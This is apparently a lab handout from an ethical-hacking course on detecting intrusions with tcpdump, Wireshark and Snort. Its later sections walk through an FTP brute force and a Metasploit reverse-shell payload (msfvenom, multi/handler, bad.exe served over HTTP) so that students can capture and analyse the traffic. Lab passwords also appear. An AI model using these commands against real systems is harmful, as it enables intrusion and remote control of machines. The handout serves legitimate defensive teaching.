SNHU - Intrusion Detection using Snort

Introduction

Objective

Overview

This lab is part of a series of lab exercises intended to support courseware for Ethical Hacker

training. The development of this document is funded by the Department of Labor (DOL)

Trade Adjustment Assistance Community College and Career Training (TAACCCT) Grant No.

TC-22525-11-60-A-48.

In this lab, students will enumerate hosts on the network using various tools.

This lab includes the following tasks:

1 - Setting Up the Sniffer

2 - Detecting Unwanted Incoming Trafﬁc

3 - Detecting Unwanted Outgoing Trafﬁc

Wireshark

A protocol analyzer that read binary capture ﬁles. Wireshark will also allow

you to capture network trafﬁc and runs on Windows, Linux, and on Mac OS

snort

An Intrusion Detection System, or an IDS, that can be used to analyze and

capture trafﬁc. By using signatures, snort can provide information about

activity within a capture ﬁle. Snort can be downloaded from www.snort.org

and is a free and commercial tool. Sourceﬁre, a Columbia, Maryland–based

company, maintains and develops snort.

tcpdump

A Linux/UNIX program that allows you to capture network trafﬁc. The

tcpdump program comes installed on many Linux distributions by default.

Sniffer

A Sniffer is used to capture network trafﬁc on a network. Software programs

like tcpdump, Wireshark, and Network Miner can be used to sniff trafﬁc.

Key Term Description

PCAP

File

Programs that can sniff network trafﬁc like tcpdump, Wireshark, and Network

Miner allow you to save the network capture to a PCAP ﬁle format. In order to

read the PCAP format, you need a tool like Wireshark or Network Miner.

Setting Up the Sniffer

Passwords help to secure systems running remote operating system. If an attacker is able to

get the administrator password on a remote system, he or she will be able to take complete

control of that device. Companies need to have mechanism in place to protect systems

connected to the Internet from being exploited by remote attackers.

Logging on to the Sniffer

The Linux distribution Kali 2 is installed on the sniffer machine. Kali 2 is a distribution used by

security professionals for penetration testing and forensics.

Key Term Description

Click on the Sniffer Linux icon on the topology.

Note: If the screen is displaying only the time, press Enter.

Type

root

for the Username. Click Next.

For the Password, type

toor

(root spelled backwards) and click the Sign In button.

Note: The password of toor will not be displayed when you type it for security

purposes.

Click the black and white icon (second from the top) to launch the Linux terminal.

root@kali2:~#

ifconfig

Type the following command to view active interfaces. Press Enter.

Note: Only the loopback address, 127.0.0.1, is displayed.

Neither of the interfaces, eth0 or eth1 is assigned an IP address on their respective networks.

The reason the sniffer has two interfaces is that it is located on two networks, the internal

network (LAN) and the external network (WAN).

Note: The 2008 Firewall also has two interfaces and is also connected to both

networks.

A sniffer should be operating in promiscuous mode so it can see all network trafﬁc. To put

the interfaces into promiscuous mode, follow the next steps:

Two ways to ensure that a sniffer will capture all trafﬁc on a network segment:

Connect the sniffer and other devices on the network to a hub

Connect the sniffer to a switch’s SPAN (Switched Port Analyzer) port

root@kali2:~#

ifconfig eth0 0.0.0.0 up

To use the ﬁrst interface, type the following command. Press Enter.

root@kali2:~#

ifconfig eth1 0.0.0.0 up

The Linux/UNIX utility tcpdump is commonly used by network administrators to capture

network trafﬁc on a sniffer. Many sniffer machines do not have GUI, or Graphical User

Interfaces, so running GUI-based tools like Wireshark or Network Miner is not possible.

Another beneﬁt to using tcpdump is that it handles very large capture ﬁles well. Wireshark

loads ﬁles into RAM, so if the ﬁle is large enough it might not open.

root@kali2:~#

tcpdump --help

root@kali2:~#

tcpdump –i eth0

To activate the second interface, type the following command. Press Enter.

Type the following command to view several available switches for tcpdump. Press

Enter.

To run tcpdump on the network segment interface eth0 is connected to, type the

following. Press Enter.

Click the Internal Windows 2008 Server from the topology.

After the machine boots, click the Send Ctrl+Alt+Delete button in the top right

corner.



Log on to the WIndows Server with the password of

P@ssw0rd12

Note: The “0” in password is a ZERO. The password of P@ssw0rd will not be

displayed when you type it for security purposes. The reason we are logging into

this machine is so it begins to generate trafﬁc

Go back to the Kali Sniffer. Wait until at least one IPv4 packet is displayed before

stopping the capture. It could take a couple of minutes before a packet shows up.

Also, what you see might be different than the screenshot below. That’s OK.

After one IPv4 packet or more is displayed, press Ctrl+C to stop the network capture. If the

network 192.168.1.0/24 is displayed, eth0 is located on the ﬁrst (internal) network. If the

network 216.0.0.0/24 is displayed, eth0 is located on the second (external) network. Also,

notice that the default for tcpdump is to capture only the ﬁrst 96 bytes. The -s 0 switch will

allow tcpdump to capture the full packet size of 65,536



Click on the Sniffer inthe topology.

root@kali2:~#

tcpdump –ieth1

To run tcpdump on the network segment interface eth1 is connected to, type the

following. Press Enter

Click on the Windows 7 Attack Machine from the topology.

Log on to Windows 7 as student with the password of

password

Press Enter.

Note: The password of password will not be displayed when you type it for

security purposes. We are only logging into this machine so it begins to generate

trafﬁc.

Click on the Sniffer icon on the topology.

Wait until at least one packet is displayed before stopping the capture. If you do not

see any trafﬁc after a few minutes, make sure you are logged on to the Windows 7

machine as student with the password of password.

After one packet or more is displayed, press Ctrl+C to stop the network capture. If the

network 192.168.1.0/24 is displayed, eth1 is located on the ﬁrst (internal) network. If the

network 216.0.0.0/8 is displayed, eth1 is located on the second (external) network. The -s 0

switch is used to capture the full packet size (65,536).

root@kali2:~#

tcpdump –i eth0 -nnntt-s 0 -w capnet1.cap -C 100

The following table lists details of the switches used with the tcpdump command:

-i eth0 Use interface zero

-nnntt Disable DNS resolution, date and time format

-s 0 Disables default packet size of 96 bytes, full packet size

-w Write to a capture ﬁle, instead of displaying to the screen

-C

Split the captures into ﬁles of this size

To capture trafﬁc on the 192.168.1.0/24 network and send it to a ﬁle, type the

following. Press Enter.

Note: Be sure to enter the appropriate interface in the command syntax!

Wait about 5 minutes so that your capture ﬁle will have some generated trafﬁc.

Packets will not display in the terminal because they are being sent to a ﬁle. Press

Ctrl+C to stop tcpdump from running and discontinue the network capture.

root@kali2:~#

wireshark capnet1.cap

Wireshark will open and the capture ﬁle will appear, similar to the one seen below. Notice

that the trafﬁc listed takes place on the 192.168.1.0/24 network.

To view the capture ﬁle, type the following command at the Terminal. Press Enter.

Click OK to the Lua Error when Wireshark opens.

From the File menu, select Quit to close Wireshark.

root@kali2:~#

tcpdump –i eth1 -nnntt-s 0 -w capnet2.cap -C 100

To capture trafﬁc on the 216.0.0.0/8 network and send it to a ﬁle, type the following.

Press Enter.

Note: Wait about 5 minutes so that your capture ﬁle will have some generated

trafﬁc.While waiting, log off and back on to the external Windows 7 Attack

machine as student with the password of password to generate some trafﬁc for

your capture ﬁle.

Click on the Sniffer icon from the topology. Press Ctrl+C to stop tcpdump from

running and discontinue the network

root@kali2:~#

wireshark capnet2.cap

Wireshark will open and the capture ﬁle will appear similar to the one seen below. Notice that

the trafﬁc listed takes place on the 216.0.0.0/8 network.

Type the following command to view the capture ﬁle.Press Enter.

Click OK to the Lua Error when Wireshark opens.

From the File menu, select Quit to close Wireshark.

CONCLUSION:

Sniffers are a very important part of network monitoring. In the real world, capture ﬁles are

huge and can cause GUI-based programs or programs that load into RAM to crash. The tool

tcpdump can be utilized on a Linux system to capture network trafﬁc.

Detecting Unwanted Incoming Attacks

Insiders are a huge threat to networks because they are inside of the ﬁrewall. For this reason,

most internal networks are monitored. In this section, we will monitor the internal network

while an attack is conducted and then review generated snort alerts.

Detecting Attacks

We will send the network trafﬁc to a log ﬁle which we will later analyze with snort. In snifﬁng

mode, snort can be used to dump output to the screen or a log ﬁle. We will dump the output

to the screen so we can view internal network communication.

Perform the following steps on the Kali 2 sniffer.

root@kali2:~#

tcpdump –i eth0 -nnntt-s 0 -w brute.cap –C 100

Type the following command to start the sniffer on the internal interface. Press Enter.

Click on the Windows 7 icon from the topology.

Open a command prompt by double-clicking the cmd-Shortcut on the desktop.

C:\>

nmap 216.1.1.1

Type the following command to scan the ﬁrewall for open ports. Press Enter.

Note: this may take up to 30 seconds to run.

Double-click on the Bruter.exe shortcut on the Windows 7 Desktop.

Type

216.1.1.1

for the Target IP. For the User, type

administrator

. For the

Dictionary, click the Browse button. Click Wordlist.txt and click Open.

Click the Start button to initiate the brute force attack against FTP.

Within Bruter, click on the Testing tab to view the actions against the victim.

Note: This will take about 5 minutes to run. Keep in mind the screen shot you see

below might not be exact depending on the time you stop the test.

After Bruter has cycled through the dictionary words, click the Result tab.

Click on the Sniffer icon from the topology.

root@kali2:~#

snort -l . -c /etc/snort/snort.conf -r brute.cap

On the Sniffer, hit Ctrl + C to stop the tcpdump program. Type the following. Press

Enter.

Wait for a new prompt and then type the following command to view the newly

created alert.ids ﬁle. Press Enter.

root@kali2:~#

leafpad alert.ids

The attack by 216.1.1.200 over port 21

The large number of attempts within seconds indicate this is not normal activity.

Type the following command to analyze the alert ﬁle generated by snort. Press Enter.

Scroll through the ﬁle and you should see a large number of brute force attempts.

The alert ﬁle is aware of the following items that took place on the internal network:

CONCLUSION:

The tcpdump utility can be used to capture network trafﬁc. After a capture ﬁle has been

generated, that capture ﬁle can be analyzed with snort. An alert ﬁle is generated when snort

examines the trafﬁc. Alerts will help us determine malicious network activity.

Detecting Unwanted Outgoing Trafﬁc

While internal threats like insiders are very real, the threats from attackers on the Internet are

also very real. If an employee inside of a company’s network is caught performing malicious

actions on the network, he or she might get ﬁred or face criminal prosecution. An attacker

from the Internet may not have to face any recourse because he or she might live in an area

in the world where he or she is out of your jurisdiction.

Using Wireshark

Note: Click the X in the top right corner to close the alert.ids window.

In this exercise, we will use Wireshark to capture the network trafﬁc, and then analyze the

PCAP ﬁle with snort. Snort can analyze PCAP ﬁles for most sniffer programs.

root@kali2:~#

tcpdump –i eth0-nntttt -s 0 -w badtraffic.cap

In order to create the malicious software that will be used by an internal network user,

perform the following steps on the External Machine running Kali 2 Linux.

Type the following command to start the sniffer on the internal interface. Press Enter.

Click on the External Kali 2 Linux icon on the topology.

Type

root

for the username. Click Next.

Note: If the Kali 2 machine is displaying only the time, press Enter.

For the Password, type

toor

(root spelled backwards) and click the Sign In button.

Note: The password of toor will not be displayed when you type it for security

purposes.

Click the black and white icon (second from the top) to launch the Linux terminal.

root@kali2:~#

msfvenom -a x86 --platform Windows -p

windows/shell/reverse_tcp lhost=216.1.1.100 lport=443 -f exe -e

x86/shikata_ga_nai -o bad.exe

root@kali2:~#

service postgresql start

Type the following command to generate a payload. Press Enter.

Note: This entire command is 1 line, do not hit enter until the entire command is

typed.

Type the following command to start the postgresql service. Press Enter.

root@kali2:~#

msfconsole

msf >

use exploit/multi/handler

Type the following command to launch the msfconsole of the Metasploit framework.

Press Enter.

Note: The Metasploit banner message often changes and frequently differs from

this photo.

To use the multi-handler within Metasploit, type the following command. Press Enter.

msf exploit(handler) >

set lhost 216.1.1.100

msf exploit(handler) >

set lport 443

msf exploit(handler) >

set payload windows/shell/reverse_tcp

msf exploit(handler) >

show options

To use the multi-handler within Metasploit, type the following command. Press Enter.

Set the listening port to 443 by typing the following command. Press Enter.

Set the payload to a reverse windows command shell by typing the following. Press

Enter.

Type the following command to verify you have set all of the options correctly. Press

Enter.

msf exploit(handler) >

exploit

To begin listening on port 443, type: the following. Press Enter.

Select File on the Linux Terminal menu. Click on Open Terminal.

root@kali2:~#

apache2ctl start

root@kali2:~#

netstat -tan

To start Apache, type the following command. Press Enter.

To view the current running services, type the following command. Press Enter.

After starting Apache, the Kali system is now also listening on port 80.

root@kali2:~#

nmap 127.0.0.1

After starting Apache, the Kali system is now also listening on port 80.

root@kali2:~#

cp bad.exe /var/www/html

root@kali2:~#

ls /var/www/html

To view the current running services, type the following command. Press Enter.

Type the following command to copy bad.exe to the HTTP root. Press Enter.

Type the following command to list the ﬁles within FTP root. Press Enter.

Click On the Internal Windows 2008 Server on the Topology.

Double-click on the Internet Explorer Shortcut on the Desktop.

Executethe following URL in Internet Explorer:

http://216.1.1.100/bad.exe

and

click Run twice. Someone may go to a URL such as this because of a Facebook or

Twitter post, a spear phish email, or they might wind up there after using a search

engine.

Click on the External Kali 2 machine from the topology.

Return to the Linux Terminal with the exploit prompt. View the connection to the

victim.

C:\Users\Administrator\Desktop>

dir

Type the following command to test the connection to get a directory listing. Press

Enter.

Click on the Sniffer icon from the topology.

root@kali2:~#

wireshark badtraffic.cap

Hit Ctrl + C to stop the tcpdump program. Type the following. Press Enter.

Click OK to the Lua Error when Wireshark opens.

Type

frame contains “Microsoft Windows”

in the Wireshark ﬁlter pane. Click

the Apply button to apply the ﬁlter.

Right-click on the stream in packet that is displayed and select Follow TCP Stream.

View the network trafﬁc between the attacker and victim machines.

CONCLUSION:

Wireshark can be used to analyze and capture network trafﬁc. Filters can be used to look for

certain IP Addresses, Protocols, or phrases within a capture ﬁle. The ﬁlter frame contains

“Microsoft Windows” can help to locate Windows command shells in trafﬁc.

Note: Press the STOP button to complete the lab.